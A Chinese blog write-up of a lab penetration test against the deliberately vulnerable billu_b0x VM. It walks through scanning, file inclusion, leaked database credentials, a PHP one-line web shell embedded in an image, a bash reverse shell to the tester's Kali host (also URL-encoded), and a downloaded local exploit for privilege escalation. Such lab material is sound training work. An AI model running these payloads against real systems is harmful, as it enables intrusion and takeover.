靶机渗透【billu_b0x】

一. billu_b0x 靶机安装

1. 靶机下载

  • 百度网盘链接提取码

billu_b0x.rar
提取码:8whr

2. 开启靶机

  • 打开 VMware,在左上角选择 - - 文件 - - 打开
    在这里插入图片描述

  • 找到 billu_b0x 靶机解压位置
    在这里插入图片描述

  • 开启后如图所示
    在这里插入图片描述

二. billu_b0x 靶机渗透

  • 开启一台 Kali
    Kali(IP):192.168.110.151

若未安装 Kali 可点击此处进行安装
虚拟机安装【Kali】(2018/2021)

1. 信息收集

1)扫描 IP

arp-scan -l

发现目标 IP:192.168.110.154
在这里插入图片描述
2)扫描端口

masscan --rate=10000 --ports 0-65535 192.168.110.154

发现目标开启 80,22端口
在这里插入图片描述
3)扫描服务

nmap -T4 -sV -O -p 80,22 192.168.110.154

发现目标开启 http,ssh服务
在这里插入图片描述
4)扫描域名目录

Kali下带有一些网站后台目录的字典,为了更好的信息收集,我们选择附带字典

dirb http://192.168.110.154 /usr/share/wordlists/dirb/big.txt

在这里插入图片描述

2. Web渗透

拿到网站目录后,我们进行一一查看登录

1)http://192.168.110.154
在这里插入图片描述

  • 发现登录点,且提示 " Show me your SQLI skills ",我们尝试 SQL 注入,使用万能密码admin' and '1'='1

在这里插入图片描述
在这里插入图片描述

  • 登录后显示如上提示,注入失败,更换目录

2)http://192.168.110.154/in
在这里插入图片描述

  • 发现 php 配置文件,疑似存在文件包含漏洞

在这里插入图片描述
3)http://192.168.110.154/add
在这里插入图片描述

  • 发现疑似文件上传点,尝试上传后无反应,更换目录

4)http://192.168.110.154/test
在这里插入图片描述

  • 发现此页面可传参 file,但 file 为空,出现 file 疑似存在文件包含,于是我们直接在链接后跟包含

在这里插入图片描述

  • 无法包含,可能 GET 传参不行,抓包修改使用 POST 传参

在这里插入图片描述
在这里插入图片描述

  • 任意包含文件,包含成功

在这里插入图片描述

  • 发现此漏洞,我们找到目录的其他子域名进行查看,最终在c.php下发现了疑似数据库用户名密码及库名

在这里插入图片描述

  • 在 panel.php 中发现了以POST形式传参的文件包含

在这里插入图片描述
4)http://192.168.110.154/phpmy/
在这里插入图片描述

  • 发现数据库,尝试用已知信息登录,登录成功

用户名:billu
密码:b0x_billu

在这里插入图片描述

  • 先前发现信息中含有 ica_lab 库名,进入查看,最终在 auth 中发现用户名密码

在这里插入图片描述

  • 回到最初登录点 http://192.168.110.154 登录

5)http://192.168.110.154/panel.php
在这里插入图片描述

  • 登录成功,来到先前发现存在文件包含的网页 panel.php,在Add User选项中发现图片文件上传点,想到上传图片马

6)http://192.168.110.154/uploaded_images/
在这里插入图片描述

  • 找到先前发现的图片下载站,随意拿下一张图片,命名为 1.jpg

在这里插入图片描述

3. 反弹shell

写下一句话木马,命名为 2.asp

<?php system($_POST[cmd]);?>
在这里插入图片描述

制作图片马

  • 本机打开cmd,切换到 1.jpg 和 2.asp 文件目录下,制作图片马

copy 1.jpg/b+2.asp/a 3.jpg
在这里插入图片描述

回到上传点,上传图片马,上传成功

在这里插入图片描述

使用 BP 抓包,点击 continue,拿到如下数据包,扔到 Repeater

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

看到 load =show 想起先前在此网页发现的以POST形式传参的文件包含如下图,load正是参数值,修改参数值,试探能否执行

在这里插入图片描述
在这里插入图片描述

发现执行成功,下一步准备用 bash 反弹 shell

  • 中间 IP 为 Kali IP,设置一个端口

echo "bash -i >& /dev/tcp/192.168.110.151/5555 0>&1" | bash

  • 此时注意,应先进行 url 编码,打开编码工具,同时 Kali 打开监听

nc -vnlp 5555

在这里插入图片描述
%65%63%68%6F%20%22%62%61%73%68%20%2D%69%20%3E%26%20%2F%64%65%76%2F%74%63%70%2F%31%39%32%2E%31%36%38%2E%31%31%30%2E%31%35%31%2F%35%35%35%35%20%30%3E%26%31%22%20%7C%20%62%61%73%68
在这里插入图片描述

将转码复制在 cmd= 后,反弹 shell

在这里插入图片描述

回到 Kali ,发现成功拿到 shell

在这里插入图片描述

4. 提权

拿到 shell 后,发现只是普通用户,接下来进行提权

1)查看当前版本

cat /etc/issue
在这里插入图片描述
Ubuntu 12.04

2)打开新的终端,使用 Kali 的漏洞扫描库

searchsploit Ubuntu 12.04

在这里插入图片描述
37292.c

3)拿下 37292.c 放到自己的网站根目录下

cd /usr/share/exploitdb/exploits/linux/local
cp 37292.c /var/www/html
在这里插入图片描述
4)开启 Apache 服务

/etc/init.d/apache2 start
在这里插入图片描述
5)回到 shell,因为权限不够,所以切换到临时目录,使用 wget 下载

cd /tmp
wget http://192.168.110.151/37292.c
在这里插入图片描述
6)编译执行

gcc 37292.c -o abc
./abc
在这里插入图片描述
7)提权

python -c 'import pty;pty.spawn("/bin/bash")'
在这里插入图片描述

  • 11
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

‍‍‪‍pinkward

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值